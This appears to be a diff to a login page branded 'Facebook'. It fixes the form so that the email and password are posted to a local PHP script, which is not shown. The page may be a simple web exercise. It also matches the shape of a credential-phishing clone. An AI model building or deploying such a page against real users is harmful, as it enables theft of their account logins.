--- a/login.html
+++ b/login.html
@@ -1,3 +1,4 @@
+
 <!DOCTYPE html>
 <html lang="en" >
 
@@ -17,14 +18,14 @@
 
   <section class="login-form-wrap">
   <h1>Facebook</h1>
-  <form class="login-form" action="POST" action="#">
+  <form class="login-form" method="POST" action="PHP/login.php">
     <label>
       <input type="email" name="email" required placeholder="Email">
     </label>
     <label>
       <input type="password" name="password" required placeholder="Password">
     </label>
-    <input type="submit" value="Login">
+    <input type="submit" value="Login" name="login">
   </form>
   <h5><a href="#">Forgot password</a></h5>
 </section>
